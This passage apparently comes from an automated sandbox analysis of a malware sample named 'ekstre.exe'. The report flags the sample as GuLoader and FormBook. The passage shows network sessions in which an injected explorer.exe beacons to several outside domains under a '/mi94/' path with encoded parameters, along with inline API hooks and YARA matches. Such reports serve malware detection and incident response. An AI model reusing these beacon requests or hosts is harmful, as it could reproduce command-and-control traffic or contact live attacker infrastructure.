Found - Women Men " /><meta http-equiv="imagetoolbar" content="no" /><base href="https://www.hu
Mar 30, 2023 14:24:00.681011915 CEST	429	IN	Data Raw: 6e 74 65 72 62 6f 6f 74 73 2d 2d 63 61 6e 61 64 61 2e 63 6f 6d 2f 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 6e 74 65 72 62 6f 6f 74 73 2d 2d 63 Data Ascii: nterboots--canada.com/" /><link rel="canonical" href="https://www.hunterboots--canada.com/index.php?main_page=page_not_found&7ncHc8=Tv6lQt-XnpBl3ra&iN64=DPf7iOV4tZbGC7wAZwygpODOxt%2FOrl%20HPYO0G2nQwomd4kRyfSlRFlrSB1ttg%2FLMfS7c" />
Mar 30, 2023 14:24:00.681046963 CEST	430	IN	Data Raw: 65 74 5f 6d 75 6f 6e 65 70 61 67 65 2e 63 73 73 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 69 6e 63 6c 75 64 65 73 2f 74 65 6d 70 6c 61 Data Ascii: et_muonepage.css' /><link rel="stylesheet" type="text/css" href='/includes/templates/musheji_mobile/css/stylesheet_musheji.css' /><link rel="stylesheet" type="text/css" href='/includes/templates/musheji_mobile/css/stylesheet_musheji_menu.css
Mar 30, 2023 14:24:00.681197882 CEST	432	IN	Data Raw: 09 61 7a 5f 63 61 72 74 5f 6f 70 61 63 69 74 79 3a 20 09 09 30 2e 39 2c 0d 0a 09 09 09 61 7a 5f 62 6f 78 5f 73 74 61 74 75 73 3a 20 09 09 09 66 61 6c 73 65 2c 0d 0a 09 09 09 61 7a 5f 74 69 6d 65 72 3a 20 09 09 09 09 22 22 2c 0d 0a 20 20 20 20 20 Data Ascii: az_cart_opacity: 0.9,az_box_status: false,az_timer: "", }; $("#animBoxCart").html(globals.az_loading_image); $("#btn_animBoxCart").hover(function(){if(globals.az_cart_fetch == fals
Mar 30, 2023 14:24:00.681235075 CEST	433	IN	Data Raw: 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d Data Ascii: font-awesome.css" type="text/css" charset="utf-8" /><link rel="stylesheet" href="css/font-awesome.min.css" type="text/css" charset="utf-8" /> </head><body id="pagenotfoundBody">...bof-header logo and navigation di
Mar 30, 2023 14:24:00.681354046 CEST	434	IN	Data Raw: 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 3f 26 61 6d 70 3b 63 75 72 72 65 6e 63 79 3d 43 41 44 22 3e 43 41 44 26 6e 62 73 70 3b 28 43 41 24 29 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <li><a href="?&currency=CAD">CAD (CA$)</a></li> </ul> </div> </div> <div class="mu-top-box-pc"> <div class="navigation-nav">
Mar 30, 2023 14:24:00.681380987 CEST	435	IN	Data Raw: 22 63 61 72 74 5f 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 6e 74 65 72 62 6f 6f 74 73 2d 2d 63 61 6e 61 64 61 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 Data Ascii: "cart_icon" href="https://www.hunterboots--canada.com/shopping_cart.html"><img src="includes/templates/musheji_mobile/images/spacer.gif" width="22" height="22" alt="" /> <div class="header_cart_only_number">0</div>
Mar 30, 2023 14:24:00.688350916 CEST	437	IN	Data Raw: 31 66 66 38 0d 0a 75 73 68 65 6a 69 5f 6d 6f 62 69 6c 65 2f 69 6d 61 67 65 73 2f 73 70 61 63 65 72 2e 67 69 66 22 20 77 69 64 74 68 3d 22 32 32 22 20 68 65 69 67 68 74 3d 22 32 32 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 20 Data Ascii: 1ff8usheji_mobile/images/spacer.gif" width="22" height="22" alt="" /></a></li> <div class="clear"></div></ul></div> <div id="categoriesPopup" class="sideBoxContent popup popup-win hidden">
Mar 30, 2023 14:24:00.688457012 CEST	438	IN	Data Raw: 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 6e 74 65 72 62 6f 6f 74 73 2d 2d 63 61 6e 61 64 61 2e 63 6f 6d 2f 6d 65 6e 2d 63 2d 32 33 2f 22 3e 4d 65 6e 3c 2f 61 3e 0a 20 20 20 20 3c 75 6c 3e 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d Data Ascii: https://www.hunterboots--canada.com/men-c-23/">Men</a> <ul> <li><a href="https://www.hunterboots--canada.com/short-ankle-rain-boots-c-23_26/">Short & Ankle Rain Boots</a></li> <li><a href="https://www.hunterboots--canada.com/sh
Mar 30, 2023 14:24:00.721570969 CEST	439	IN	Data Raw: 6e 63 6c 75 64 65 73 2f 74 65 6d 70 6c 61 74 65 73 2f 6d 75 73 68 65 6a 69 5f 6d 6f 62 69 6c 65 2f 69 6d 61 67 65 73 2f 6d 65 6e 75 2f 6e 6f 64 65 2d 6f 6e 2e 67 69 66 22 2c 22 69 6e 63 6c 75 64 65 73 2f 74 65 6d 70 6c 61 74 65 73 2f 6d 75 73 68 Data Ascii: ncludes/templates/musheji_mobile/images/menu/node-on.gif","includes/templates/musheji_mobile/images/menu/node-open-end-on.gif","includes/templates/musheji_mobile/images/menu/node-open-end.gif","includes/templates/musheji_mobile/images/menu/nod
Mar 30, 2023 14:24:00.850120068 CEST	441	IN	Data Raw: 65 6e 20 63 61 72 74 2d 64 72 6f 70 64 6f 77 6e 2d 77 72 61 70 70 65 72 20 70 6f 70 75 70 20 70 6f 70 75 70 2d 77 69 6e 22 3e 0d 0a 09 09 09 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 22 3e 0d 0a 09 09 09 Data Ascii: en cart-dropdown-wrapper popup popup-win"> <div class="content-wrapper"><div><div class="cartBoxEmpty">Your cart is empty.</div></div> </div> </div></div><div class="clearBoth"></div><div class="

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.11.20	49821	45.132.157.81	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 14:24:21.106820107 CEST	464	OUT	GET /mi94/?iN64=yWvflPZmA6sDTRnU+9mPZ73OUYs40Kr339wYW1rax9u/9VBDQLHJ+4R0Ww036kIARE0W&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1 Host: www.cursosweb22.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 14:24:21.311131954 CEST	465	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Thu, 30 Mar 2023 12:24:19 GMT server: LiteSpeed location: https://www.cursosweb22.online/mi94/?iN64=yWvflPZmA6sDTRnU+9mPZ73OUYs40Kr339wYW1rax9u/9VBDQLHJ+4R0Ww036kIARE0W&7ncHc8=Tv6lQt-XnpBl3ra platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.11.20	49823	62.149.128.45	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 14:24:41.556050062 CEST	473	OUT	GET /mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=GzonJysSCxRGkwuMNYAbGaaQ0mJlLDwvvbsPrzKkAvYoJl+ajLQ6kQQMPxWrYSJRg4EW HTTP/1.1 Host: www.iltuosentiero.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 14:24:41.578622103 CEST	474	IN	HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Thu, 30 Mar 2023 12:24:41 GMT Connection: close Content-Length: 5057 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;co
Mar 30, 2023 14:24:41.578732967 CEST	476	IN	Data Raw: 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a Data Ascii: lor:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;
Mar 30, 2023 14:24:41.578810930 CEST	477	IN	Data Raw: 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e Data Ascii: ;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is
Mar 30, 2023 14:24:41.578886986 CEST	478	IN	Data Raw: 3b 49 49 53 20 57 65 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71 Data Ascii: ;IIS Web Core</td></tr> <tr><th>Notification</th><td>   MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>   StaticFile</td></tr> <tr><th>Error Code</th><td>   0x8007000
Mar 30, 2023 14:24:41.599704027 CEST	478	IN	Data Raw: 33 26 61 6d 70 3b 49 49 53 37 30 45 72 72 6f 72 3d 34 30 34 2c 30 2c 30 78 38 30 30 37 30 30 30 32 2c 39 36 30 30 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 26 72 61 71 75 6f 3b 3c 2f 61 3e 3c 2f 70 3e 20 0a 20 20 20 Data Ascii: 3&IIS70Error=404,0,0x80070002,9600">View more information »</a></p> </fieldset> </div> </div> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.11.20	49829	67.21.93.229	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 14:25:02.879374027 CEST	535	OUT	GET /mi94/?iN64=ucLR8l4OnnzTTT+Cl0iGjLwYehJgmVWcPF1J5boC9Slql7vaJu9GnsPK80Xp04+ZInVR&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1 Host: www.6880365.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 14:25:03.046663046 CEST	535	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 30 Mar 2023 12:25:02 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xEE
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xEE
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xEE
GetMessageA	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xEE

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ekstre.exePID: 1600, Parent PID: 4744

General

Target ID:	0
Start time:	14:19:05
Start date:	30/03/2023
Path:	C:\Users\user\Desktop\ekstre.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\ekstre.exe
Imagebase:	0x400000
File size:	330402 bytes
MD5 hash:	9382DB91F2E5799A51DA843A33E3E2FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.1227114587.0000000003769000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1228563483.00000000081F9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ekstre.exePID: 3348, Parent PID: 1600

General

Target ID:	2
Start time:	14:19:31
Start date:	30/03/2023
Path:	C:\Users\user\Desktop\ekstre.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\ekstre.exe
Imagebase:	0x400000
File size:	330402 bytes
MD5 hash:	9382DB91F2E5799A51DA843A33E3E2FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 4744, Parent PID: 3348

General

Target ID:	3
Start time:	14:19:43
Start date:	30/03/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff67c800000
File size:	4849904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.5855696363.000000000A7ED000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: control.exePID: 4716, Parent PID: 4744

General

Target ID:	4
Start time:	14:19:49
Start date:	30/03/2023
Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\control.exe
Imagebase:	0xa70000
File size:	148992 bytes
MD5 hash:	4DBD69D4C9DA5AAAC731F518EF8EBEA0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 